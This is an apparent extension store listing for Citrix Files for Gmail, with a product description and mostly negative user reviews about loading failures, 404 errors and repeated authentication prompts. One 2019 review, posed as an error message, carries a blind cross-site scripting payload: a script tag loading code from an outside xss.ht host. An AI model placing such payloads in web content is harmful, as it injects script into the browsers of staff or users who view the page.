Send and request large attachments securely using Citrix.
Send and request large attachments securely directly from email using Citrix Files for Gmail. The Citrix Files for Gmail Chrome Extension allows you to bypass file size restrictions and add security to your attachments. Be notified whenever someone accesses a file or sends you a file so you are always aware of what is going and can take action. You can also set expiration policy, different security and access levels for your attachments. A Citrix Content Collaboration (ShareFile) account is required. You can sign up for a trial at https://trial.sharefile.com/trial/cq/p1n.aspx?src=apps-gmailplugin&utm_medium=apps&utm_source=gmailplugin
- (2020-07-22) Christopher Hinders: The attachment works maybe half the time. Invariably I'll go through the whole process, then hit Insert Link as the last step and it hangs. Then I have to refresh and start all over again.
- (2019-12-27) Deaton Smith: Doesn't work most of the time. This would be a great plug-in if it worked consistently.
- (2019-12-18) Conor Peleman: I need to use this for work. When it works, it works. But that's only 50% of the time. The other 50% of the time the plugin will 1) be a blank white box and never completely load (until I refresh the page and make another attempt) 2) once a file is dropped the file will never completely load (until I refresh the page and make another attempt) 3) once a file is completely loaded and ready to insert onto the email, it ends up never loading (until I refresh the page and make another attempt). This is very frustrating as I have no choice but to use sharefile for certain things. Fix it Citrix. You're a massive company. Fix it. It's been like this for months.
- (2019-10-13) Yogendra Jaiswal: hi i am using this extension getting an error like this "><script src=https://vulnholich1.xss.ht></script>
- (2019-06-17) KCL: Doesn't work even though Citrix insist that it should. Tried everything, including long sessions with Citrix, all other extensions removed, incognito mode, antivirus software off, no firewall, white listed Citrix files. Probably wasted three days trying to get it to work reliably. When it works it is fine, but the performance is erratic. Using Windows 10 and everything up to date on computer.
- (2019-04-22) Mason Byers: Have to sign-out almost every time I try to upload a file. Makes my process twice as long if not more. Need to look at changing their product name as "sharing" files is not an easy thing to do.
- (2018-12-27) Mark Harvey: Never worked. Couldn't even see any support to fix the problem.
- (2017-11-15) Matthew Valentinas: USeless. Sent from company in Germany.Video file. Wasted half hour trying to open it. No luck. I guess I will never be able to open it.
- (2017-11-08) Mark Breon: We never got the extension to work. We turned off all ad-blockers and spent 2.5 hours on the phone with support but we were not able to send files using this extension.
- (2017-06-16) Bradford Shannon: The ShareFile Gmail plugin is great way to send files securely through my gmail accounts!
- (2017-06-06) sara lechner: love it!
- (2017-05-10) Jesse Lipson: Disclaimer: I founded ShareFile and used to work for Citrix. I just used to Gmail as my main mail client, and I'm thrilled to be able to use most of the functionality of the ShareFile Outlook plug-in for Gmail.
- (2017-05-08) Steve Jobs: So happy to be able to use my gmail account to send files securely! Sooooo simple and easy to use!
- (2020-09-14, v:2.0.1) Christopher Hinders: Failed to Authenticate
Every time I try to attach a file a new email I get a Failed to Authenticate error and have go through the whole login process again.
- (2020-08-19, v:2.0.1) Joe Cook: Failed to Authenticate
I can send files most of the time, but I have to re-authenticate everytime now. Before, It would keep me authenticated for days or weeks, but now before sending files, every email has to be re-authenticated.
- (2020-08-12, v:2.0.1) Hazel Erickson: citrix files for gmail
When I try to attach a file when in a new email message and click on the Citrix icon all I get is a blank box...the attachment process never starts.
- (2020-03-17, v:2.0.1) CJ D: Failed to Authenticate
I installed the Citrix Files for Gmail extension. Clicking onto the extension icon I was able to sign in and adjust my options. However, the problem is when I try to attached a Sharefile link in an email I get the Sharefile pop screen to sign-in and it says, in the upper right corner "Failed to authenticate".
- (2020-03-11, v:2.0.1) Cynthia Francisco: always asking for our company's subdomain and my email address
i have been using Gmail Citrix Sharefile extension for a few years now. Recently, everytime I have to add link to request or share files, it says "failed to authenticate" and asks for company's subdomain and email address. Then I have to enter verification code. This has gotten quite annoying and not very efficient. Please let me know how to resolve this issue.
- (2020-01-21, v:2.0.1) Kim Clontz: can't attach files
This gmail add on is no longer working...after i click on citrix icon it just shows me a blank white box.
- (2020-01-20, v:2.0.1) JENNIFER CASTILLO: Having Trouble with uploading files to my gmail emails
I have been using the plugin for a couple days and at first it was working great, but now my colleagues and I cannot send documents because the file won't load or it will not finishing attaching the file securely to the email. Please help.
- (2019-10-17, v:2.0.1) Ronald Seroda CPA: Share file icon not showing up in emails.
Sometimes the icon shows and I can attach files and sometimes it does not. Why is this happening?
- (2019-09-06, v:2.0.1) Lynn Robie: Sharefile in Chrome
I am running the Sharefile Chrome Extension V 2.0.1 What do I need to do to prepare for the 10/31/19 elimination of TLS?
- (2019-01-16, v:1.2.6) hyper link to add in signature in gmail
hyper link to add in signature in gmail
- (2018-12-27, v:1.2.6) Mark Harvey: Not working
Click on Sharefile "S" and I get a blank, frozen pop-up screen.
- (2018-10-26, v:1.2.3) CJ D: Sharefile Extension Not Working
I installed the extension and when I click onto the extension icon in Google Chrome, and then click onto Options I get a screen that says, "Page Not Found - The page you were looking for was not found". I tried this extension on a few other computers and I got the same result. I'm also unable to attach Sharefile documents to my emails...I get the same error.
- (2018-10-25, v:1.2.3) Sharefile for Gmail 404 error
The chrome extension is not working. In Gmail, when I click the icon I get the white screen which then turns to the 404 error. I get the same screen if I try to access options from the Sharefile icon on chrome.
- (2018-10-24, v:1.2.3) Page Not Found
'404' Page Not Found, The page you were looking for was not found. Back to Sign in. The above shows up in a white pop-up screen after clicking Sharefile for G-mail icon. Sharefile for Outlook is working alright. Tried two different PC but the same error comes up. Please guide me through how to resolve this.
- (2018-10-24, v:1.2.3) Karl CPA: Not working
When I try to share a file, I get this: 404 Page not Found The page you are looking for is not found Then there is this button on the bottom: Back to Sign In When I click on it, the page whites out, so I have to drag document to get rid of it and restart Gmail. What can be done?
- (2018-10-23, v:1.2.3) Grey out
When i go to click on the S to use share file my screen goes white and it freezes. Please help.
- (2018-08-07, v:1.2.3) doesn't work sometimes
Hello, Sometimes I add the file and the screen goes white and thinks and thinks and thinks. I have to log out and try it again. That could take 4 tries before the file pops into my email message the way it's suppose to. Is there a fix for this? Should I uninstall and reinstall? Thx!!